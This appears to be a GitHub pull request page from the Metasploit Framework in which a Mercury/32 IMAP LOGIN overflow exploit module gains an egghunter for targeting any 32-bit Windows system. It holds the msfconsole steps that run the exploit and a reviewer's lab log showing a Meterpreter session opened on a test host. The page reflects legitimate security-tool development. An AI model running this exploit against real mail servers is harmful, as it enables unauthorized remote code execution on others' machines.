Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Upgraded exploit to work on any Windows target #10853

Merged
merged 17 commits into from Oct 28, 2018
Merged

Upgraded exploit to work on any Windows target #10853

merged 17 commits into from Oct 28, 2018

Conversation

kr3bz
Copy link
Contributor

@kr3bz kr3bz commented Oct 23, 2018

In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.

Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use exploit/windows/imap/mercury_login
  • set RHOST x.x.x.x
  • exploit

@kr3bz
Upgraded exploit to work on any Windows target
ee3c663 
In short, added egghunter and return address of
the executable file itself, so it should work
on any windows system.

Also, upgraded to modern exploit module requirements.
bcoles
bcoles reviewed Oct 23, 2018
View reviewed changes
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
bcoles and others added 5 commits October 23, 2018 14:32
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.rb
43dd230 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.rb
0b37e29 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.rb
903f5e9 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.rb
0e72590 
Co-Authored-By: kr3bz <racic.ivan@gmail.com>
@kr3bz
Added modified mercury_login.rb
be2ec76 
Modified the script with recommendations.
@bcoles
Copy link
Contributor

bcoles commented Oct 23, 2018

Looks like msftidy is complaining as there's an extra space at the end of the 'Author' => line.

$ ./.git/hooks/post-merge
[*] Running msftidy.rb in ./.git/hooks/post-merge mode
--- Checking new and changed module syntax with tools/dev/msftidy.rb ---
modules/exploits/windows/imap/mercury_login.rb:22 - [WARNING] Spaces at EOL
------------------------------------------------------------------------
------------------------------------------------------------------------
[*] This merge contains modules failing msftidy.rb
[*] Please fix this if you intend to publish these
[*] modules to a popular metasploit-framework repo
------------------------------------------------------------------------

bcoles
bcoles reviewed Oct 23, 2018
View reviewed changes
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
modules/exploits/windows/imap/mercury_login.rb Outdated Show resolved Hide resolved
@kr3bz
Added updated mercury_login
2e2d742 
Added additional space for the payload, made recommended changes, msftidy does not produce errors, readded null byte as a badchar.
@bcoles
Copy link
Contributor

bcoles commented Oct 28, 2018

I tried this out on 64-bit Windows, and it failed, although not surprising.

Tested successfully on:

  • 4.01a on Windows XP SP3 (x86)
  • 4.01a on Windows 7 SP1 (x86)
  • 4.01b on Windows 7 SP1 (x86)
msf5 exploit(windows/imap/mercury_login) > check
[+] 172.16.191.252:143 The target is vulnerable.
msf5 exploit(windows/imap/mercury_login) > run

[*] 172.16.191.252:143 - Sending payload (8931 bytes) ...
[*] Started bind TCP handler against 172.16.191.252:4444
[-] The connection timed out (172.16.191.252:4444).
[*] Sending stage (179779 bytes) to 172.16.191.252
[*] Meterpreter session 1 opened (172.16.191.138:53859 -> 172.16.191.252:4444) at 2018-10-28 03:20:10 -0400

meterpreter > getuid
Server username: WIN-PJARRFI1A3A\user
meterpreter > sysinfo
Computer        : WIN-PJARRFI1A3A
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

@bcoles bcoles self-assigned this Oct 28, 2018
bcoles and others added 2 commits October 28, 2018 09:41
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.rb
bfd3a17 
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
@bcoles @kr3bz
Update modules/exploits/windows/imap/mercury_login.md
a343100 
Co-Authored-By: kr3bz <44395414+kr3bz@users.noreply.github.com>
@bcoles
Copy link
Contributor

bcoles commented Oct 28, 2018

Thanks. This looks good to me. I'll land this in the next couple days.

@bcoles bcoles merged commit 370bcaf into rapid7:master Oct 28, 2018
bcoles added a commit that referenced this pull request Oct 28, 2018
@bcoles
Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit
1c340f8
@bcoles bcoles added the rn-enhancement release notes enhancement label Oct 28, 2018
@bcoles
Copy link
Contributor

bcoles commented Oct 28, 2018

Release Notes

This adds an egghunter to exploit/windows/imap/mercury_login for automatic targeting of 32-bit Windows systems.

@kr3bz kr3bz deleted the mercury_imap_upgrades branch October 28, 2018 18:53
msjenkins-r7 pushed a commit that referenced this pull request Oct 29, 2018
@bcoles @msjenkins-r7
Land #10853, Add universal targeting to Mercury/32 IMAP LOGIN exploit
d6c4f5e
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bcoles bcoles bcoles approved these changes

Assignees

@bcoles bcoles

Labels
docs enhancement module rn-enhancement release notes enhancement
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
2 participants
@kr3bz @bcoles